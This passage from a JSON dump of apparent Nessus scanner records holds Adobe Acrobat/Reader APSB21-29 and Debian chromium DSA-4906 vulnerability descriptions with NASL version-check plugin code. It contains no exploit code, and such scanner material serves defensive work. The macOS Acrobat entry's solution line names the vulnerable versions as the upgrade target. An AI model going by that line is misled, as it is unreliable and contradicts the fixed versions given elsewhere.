CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Reader', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:00", "description": "The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149381", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149381);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30194 / 2020.001.30020 / 2021.001.20150 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Acrobat');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:55", "description": "The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-06-09T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149380", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149380);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/09\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Acrobat', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:29", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2021-21201 Gengming Liu and Jianyu Chen discovered a use-after-free issue.\n\n - CVE-2021-21202 David Erceg discovered a use-after-free issue in extensions.\n\n - CVE-2021-21203 asnine discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21204 Tsai-Simek, Jeanette Ulloa, and Emily Voigtlander discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21205 Alison Huffman discovered a policy enforcement error.\n\n - CVE-2021-21207 koocola and Nan Wang discovered a use-after-free in the indexed database.\n\n - CVE-2021-21208 Ahmed Elsobky discovered a data validation error in the QR code scanner.\n\n - CVE-2021-21209 Tom Van Goethem discovered an implementation error in the Storage API.\n\n - CVE-2021-21210 @bananabr discovered an error in the networking implementation.\n\n - CVE-2021-21211 Akash Labade discovered an error in the navigation implementation.\n\n - CVE-2021-21212 Hugo Hue and Sze Yui Chau discovered an error in the network configuration user interface.\n\n - CVE-2021-21213 raven discovered a use-after-free issue in the WebMIDI implementation.\n\n - CVE-2021-21214 A use-after-free issue was discovered in the networking implementation.\n\n - CVE-2021-21215 Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\n - CVE-2021-21216 Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\n - CVE-2021-21217 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21218 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21219 Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\n - CVE-2021-21221 Guang Gong discovered insufficient validation of untrusted input.\n\n - CVE-2021-21222 Guang Gong discovered a buffer overflow issue in the v8 JavaScript library.\n\n - CVE-2021-21223 Guang Gong discovered an integer overflow issue.\n\n - CVE-2021-21224 Jose Martinez discovered a type error in the v8 JavaScript library.\n\n - CVE-2021-21225 Brendon Tiszka discovered an out-of-bounds memory access issue in the v8 JavaScript library.\n\n - CVE-2021-21226 Brendon Tiszka discovered a use-after-free issue in the networking implementation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-29T00:00:00", "type": "nessus", "title": "Debian DSA-4906-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4906.NASL", "href": "https://www.tenable.com/plugins/nessus/149082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4906. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149082);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"DSA\", value:\"4906\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Debian DSA-4906-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21201\n Gengming Liu and Jianyu Chen discovered a use-after-free\n issue.\n\n - CVE-2021-21202\n David Erceg discovered a use-after-free issue in\n extensions.\n\n - CVE-2021-21203\n asnine discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21204\n Tsai-Simek, Jeanette Ulloa, and Emily Voigtlander\n discovered a use-after-free issue in Blink/Webkit.\n\n - CVE-2021-21205\n Alison Huffman discovered a policy enforcement error.\n\n - CVE-2021-21207\n koocola and Nan Wang discovered a use-after-free in the\n indexed database.\n\n - CVE-2021-21208\n Ahmed Elsobky discovered a data validation error in the\n QR code scanner.\n\n - CVE-2021-21209\n Tom Van Goethem discovered an implementation error in\n the Storage API.\n\n - CVE-2021-21210\n @bananabr discovered an error in the networking\n implementation.\n\n - CVE-2021-21211\n Akash Labade discovered an error in the navigation\n implementation.\n\n - CVE-2021-21212\n Hugo Hue and Sze Yui Chau discovered an error in the\n network configuration user interface.\n\n - CVE-2021-21213\n raven discovered a use-after-free issue in the WebMIDI\n implementation.\n\n - CVE-2021-21214\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21215\n Abdulrahman Alqabandi discovered an error in the\n Autofill feature.\n\n - CVE-2021-21216\n Abdulrahman Alqabandi discovered an error in the\n Autofill feature.\n\n - CVE-2021-21217\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21218\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21219\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21221\n Guang Gong discovered insufficient validation of\n untrusted input.\n\n - CVE-2021-21222\n Guang Gong discovered a buffer overflow issue in the v8\n JavaScript library.\n\n - CVE-2021-21223\n Guang Gong discovered an integer overflow issue.\n\n - CVE-2021-21224\n Jose Martinez discovered a type error in the v8\n JavaScript library.\n\n - CVE-2021-21225\n Brendon Tiszka discovered an out-of-bounds memory access\n issue in the v8 JavaScript library.\n\n - CVE-2021-21226\n Brendon Tiszka discovered a use-after-free issue in the\n networking implementation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4906\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 90.0.4430.85-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", 